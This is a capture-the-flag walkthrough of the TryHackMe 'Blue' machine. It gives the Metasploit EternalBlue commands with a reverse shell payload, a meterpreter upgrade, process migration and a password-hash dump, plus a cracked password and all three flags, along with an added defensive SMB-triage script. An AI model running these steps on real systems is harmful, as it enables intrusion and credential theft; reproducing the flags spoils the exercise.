THM_Blue_Walkthrough
Eternal Blue TryHackMe
performed by: jb-williams
Note: some output is shortened; the cut is marked with "....".
Scanning/Recon
After finding the IP address, I ran my basic nmap recon:

```
nmap -v -sV -sC -oN initial 10.10.10.13
```

Results:

```
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
....
....
```
- Came back with these results and noticed ports `138` and `445`, which are usually SMB, so I ran nmap with specific SMB scripts. The first one could work, but I don't think my VM could handle it, so I did a little research and ran the second command:

```
nmap -v --script=smb* -oN scripts 10.10.10.13
nmap -v --script=smb-vuln-ms17-010 -oN smbscript 10.10.10.13
```
- The results of the SMB scan were:

```
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
....
....

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Host script results:
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:8d:e0:a6:1c:6f (unknown)
| Names:
|   JON-PC<00>                    Flags: <unique><active>
|   WORKGROUP<00>                 Flags: <group><active>
|   JON-PC<20>                    Flags: <unique><active>
|   WORKGROUP<1e>                 Flags: <group><active>
|   WORKGROUP<1d>                 Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-23T10:23:28-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-09-23 16:23:28
|_  start_date: 2022-09-23 16:17:45
```
- Found that the SMB vulnerability was rated `HIGH`, and went to Metasploit to find an exploit to attempt.
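As an added example (not part of the original walkthrough), here is a small Python triage script that parses nmap host-script output like the scan above into defender-facing findings. The sample text is a constructed, re-indented excerpt of that scan; `parse_host_scripts` and `triage` are my own helper names, and the severity labels for the two signing findings are my own.

```python
import re
# Constructed excerpt of the host-script output from the smb-vuln-ms17-010 scan above.
SAMPLE_NMAP = """\
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""
# A script header is '| name:' with nothing else; names are lowercase, so 'VULNERABLE:' never matches.
SCRIPT_HEADER = re.compile(r"^\|_?\s([a-z0-9-]+):\s*$")

def parse_host_scripts(text):
    """Group nmap host-script output into {script_name: [stripped detail lines]}."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue                      # 'Host script results:' and other non-script text
        m = SCRIPT_HEADER.match(line)
        if m:
            current = m.group(1)
            scripts[current] = []
        elif current is not None:
            scripts[current].append(line.lstrip("|_").strip())
    return scripts

def triage(text):
    """Turn parsed output into (severity, finding, fix) tuples; signing severities are my own labels."""
    scripts, findings = parse_host_scripts(text), []
    vuln = scripts.get("smb-vuln-ms17-010", [])
    if any(l.startswith("State: VULNERABLE") for l in vuln):
        risk = next((l.split(":", 1)[1].strip() for l in vuln if l.startswith("Risk factor:")), "HIGH")
        cves = ",".join(l.split("CVE:", 1)[1].strip() for l in vuln if "CVE:" in l)
        findings.append((risk, "SMBv1 unpatched for MS17-010 (%s)" % cves, "install MS17-010 and disable SMBv1"))
    if any(l.startswith("message_signing: disabled") for l in scripts.get("smb-security-mode", [])):
        findings.append(("HIGH", "SMB1 message signing disabled", "set LanmanServer RequireSecuritySignature=1"))
    if any("not required" in l for l in scripts.get("smb2-security-mode", [])):
        findings.append(("MEDIUM", "SMB2 message signing not required", "require signing on the server"))
    return findings
```

Feed it a whole `-oN` file and it reports once per host block; the three findings it raises for this scan are exactly the ones a patch and hardening ticket for this box would list.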
Gain Access
```
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
```
- I noticed the scanner module and decided to verify the vulnerability with it, which confirmed it.
- Then I tried the index 2 exploit.
```
msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
```

- You may have to press ENTER to make the CMD prompt open.
- Then press `CTRL+Z` to push this shell session to the background.
Escalate
- Then you can try to escalate the standard shell session to an escalated meterpreter session.
- Select the `shell_to_meterpreter` module.
```
C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
```
- List the module's options with `options`.
- List the available sessions with `sessions -l`.
- Set the session option to the correct session and run.
- After it completes, run `sessions -l` and then `sessions -i <ID#>` to connect to that session.
- Verified escalation by checking my user:
```
meterpreter > shell
Process 1704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```
- Looking through the processes on the machine, I found that this one seemed interesting:

```
C:\Windows\system32>

 PID   PPID  Name          Arch  Session  User                 Path
 ---   ----  ----          ----  -------  ----                 ----
 668   608   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
```
- Then I migrated to winlogon.exe and was able to dump the password hashes on the system.

```
meterpreter > migrate -P 668
[*] Migrating from 748 to 668...
[*] Migration completed successfully.
meterpreter >
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
```
Cracking
- Then I took Jon's password hash `ffb43f0de35be4d9917ac0cc8ad57f8d`.
- Used Crackstation.net to crack the hash.

| User | Password |
|---|---|
| jon | alqfna22 |
- Was able to log in as Jon, then started looking for flags.

```
meterpreter > search -f flag*.txt
Found 3 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
```
Searching for flags
- Found flag1 by going to the root of the C: drive, running `ls` and catting `flag1.txt`:

```
flag{access_the_machine}
```

- Found flag2 by looking for the Windows SAM config:

```
C:/Windows/System32/config
ls
cat flag2.txt
flag{sam_database_elevated_access}
```

- Found flag3 in Jon's Documents folder:

```
meterpreter > cat c:\\Users\\Jon\\Documents\\flag3.txt
flag{admin_documents_can_be_valuable}
```
written and performed by jb-williams - github
2022-09-28 10:21